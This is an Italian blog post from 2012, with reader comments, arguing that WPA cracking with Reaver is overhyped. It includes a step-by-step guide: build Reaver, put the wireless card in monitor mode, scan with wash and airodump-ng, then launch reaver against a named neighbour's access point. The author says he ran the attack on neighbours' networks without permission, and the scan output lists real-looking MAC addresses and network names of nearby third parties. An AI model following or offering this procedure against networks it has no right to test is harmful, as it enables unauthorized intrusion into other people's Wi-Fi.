venerdì 3 febbraio 2012

WPA Cracking ... un'altra favola per chi ama riempirsi la bocca ...

Di recente in Internet è apparso un nuovo sistema di forzatura delle reti WPA chiamato Reaver ... a titolo esemplificativo vi linko alcuni articoli...

http://www.bufferoverflow.it/2012/01/08/bucare-una-rete-wi-fi-protetta-con-ubuntu-usando-reaver/
http://lifehacker.com/5873407/how-to-crack-a-wi+fi-networks-wpa-password-with-reaver

Tempo fa' era uscito un'altro sistema (GERIX) ... leggete questo titolo ...


http://www.hackgeek.it/con-gerix-wifi-cracker-anche-mia-nonna-saprebbe-craccare-una-rete-wifi/

.... tanta fuffa, tanto copia incolla da un sito all'altro da un blog ad un'altro che hanno una cosa in comune oltre alla notizia. NESSUNO PRODUCE RISULTATI DI QUALI APPARATI RISULTINO VULNERABILI E IN QUALI CONDIZIONI.

-----------------------------------------------------------------------------
NOTA del 23/5/2013
Un'utente ci ha gentilmente segnalato su quali apparati la vulnerabilità WPS (quindi non strettamente WPA) è presente:
www.kb.cert.org/vuls/id/723755
Sapendo questo si può stabilire quali apparati provare ad attaccare a seconda del MAC address (che riconduce al brand). Incrociando le dita sul fatto che abbiano utilizzato il WPS anzichè impostare una passphrase a mano.... 
----------------------------------------------------------------------------

Bene signori, sappiate che sono tutte fandonie !!!!!
Ho lasciato giorni i PC di casa e dell'ufficio a crackare le mie reti e quelle dei vicini ... senza l'ombra di alcun risultato positivo.... ... Altro che anche mia nonna riuscirebbe a crackare una rete WPA .... solo buoffonate....

Se volete cimentarvi, vi pubblico qui una guida completa che ha funzionato sia su Ubuntu 10.04 che su 11.10.


ed estraetelo.

Reaver và compilato ... per farlo:
---------------------------------------
sudo apt-get install build-essential
sudo apt-get install libpcap0.8-dev
sudo apt-get install libsqlite3-dev

cd ~/Scaricati/reaver-1.4/src

./configure
make
sudo make install
-----------------------------

Per comodità installate anche la suite aircrack-ng
con il comando:
-------------------
sudo apt-get install aircrack-ng
-------------------

pare che nelle prossime versioni di ubuntu il pacchetto non sarà più presente... sarà un casino compilarlo a mano xke bisogna indietreggiare la versione del compilatore c di sistema
questo il link del sorgente:
questo un cenno sulla versione del gcc:


Dopodiche' bisogna mettere l'interfaccia wireless in modo promiscuo. (quindi disabiliteremo la connettività)
---------------------------------------------------------------------
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
-----------------------------------------------------------------
in alternativa si può usare (ma io non l'ho fatto .... tutti i comandi farebbero riferimento a mon0 anzichè wlan 0)
sudo airmon-ng start wlan0 

Ora bisogna cercare le reti vulnerabili all'attacco reaver con la sua utility WASH
-------------------------------------------------
sudo wash -i wlan0 --ignore-fcs
-------------------------------------------------

Questo il risultato:


BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
C0:C1:C0:05:C6:A9       1            -89        1.0               No                RossoSole
E0:91:F5:46:BF:22       6            -90        1.0               No                Elio
02:BD:B9:E2:42:B2       1            -92        1.0               No                dlink
D8:5D:4C:F5:16:27       4            -90        1.0               No                TP-LINK_F51628
08:86:3B:57:23:10       6            -90        1.0               No                belkin.310

Se volete vedere la differenza tra le reti e i client presenti in aria e gli AP vulnerabili bisogna usare AIRODUMP-NG
----------------------------------------------
sudo airodump-ng wlan0

CH 13 ][ Elapsed: 1 min ][ 2012-02-01 12:15                                         
                                                                                                     
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                      
                                                                                                     
 00:0C:42:61:4C:D5  -32      463      239    8   9  54 . WPA  CCMP   PSK  APCavalieri                
 00:0C:42:94:93:CD  -75      353       80    2   9  54 . WPA  CCMP   PSK  APCavalieri                
 00:14:C1:2E:66:19  -86       52        0    0  11  54e. WEP  WEP         USR9111                    
 00:E0:4D:90:F4:6C  -88       14        0    0  11  54   WPA2 CCMP   PSK  InfostradaWiFi-001399      
 E0:91:F5:46:BF:22  -88       53        2    0   6  54e. WPA2 CCMP   PSK  Elio                       
 1C:BD:B9:40:2C:0A  -88       52        0    0   6  54e  WPA2 CCMP   PSK  D-Link                     
 C0:C1:C0:05:C6:A9  -89       46        0    0   1  54e  WPA2 CCMP   PSK  RossoSole                  
 08:86:3B:57:23:10  -89        7        0    0   6  54e  WPA2 CCMP   PSK  belkin.310                 
                                                                                                     
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                           
                                                                                                     
 (not associated)   00:08:CA:21:FA:FA  -51    0 - 1      0        7                                   
 (not associated)   04:46:65:56:9B:60  -87    0 - 1      0       56  Alice-31436523,Alice-36598782,FAS
 (not associated)   3C:4A:92:AC:D9:86  -88    0 - 1     96      116  Alice-45008691                   
 00:0C:42:61:4C:D5  D8:B3:77:16:8F:7F   -1   11 - 0      0        3                                   
 00:0C:42:61:4C:D5  74:A7:22:E0:7D:84  -23   54 -54      0       10                                   
 00:0C:42:61:4C:D5  04:1E:64:BE:67:8C  -61    5 - 1      0       35  APCavalieri                      
 00:0C:42:61:4C:D5  DC:2B:61:68:D8:0E  -63    1 -54      0       86          
-----------------------------------------------

Con questi dati, ho deciso di attaccare l'AP Rossosole ... quello col segnale relativamente migliore.. devo specificare il MAC del AP

-------------------------------------
sudo reaver -i wlan0 -b C0:C1:C0:05:C6:A9 -vv
--------------------------------------

4 commenti:

  1. quindi sei riuscito o no?
    reaven non è un attacco bruteforce?

    RispondiElimina
  2. No. il mio obiettivo non era riuscirci, ho altro da fare. Il mio obbiettivo era vedere se "anche mia nonna" riuscirebbe a bucare il WPA.
    Cosi' non è, quindi il WPA è ad oggi da considerarsi un sistema di protezione delle reti wireless abbastanza sicuro per utenti casalinghi o piccoli uffici.

    RispondiElimina
  3. Il WPA Cracking funziona davvero ma di sicuro non ci riuscirebbe la nonna di nessuno di noi anzi è una procedura abbastanza complessa, almeno per chi non ha una discreta conoscenza informatica.

    RispondiElimina
  4. Il WPA Cracking funziona davvero ma di sicuro non ci riuscirebbe la nonna di nessuno di noi anzi è una procedura abbastanza complessa, almeno per chi non ha una discreta conoscenza informatica.

    RispondiElimina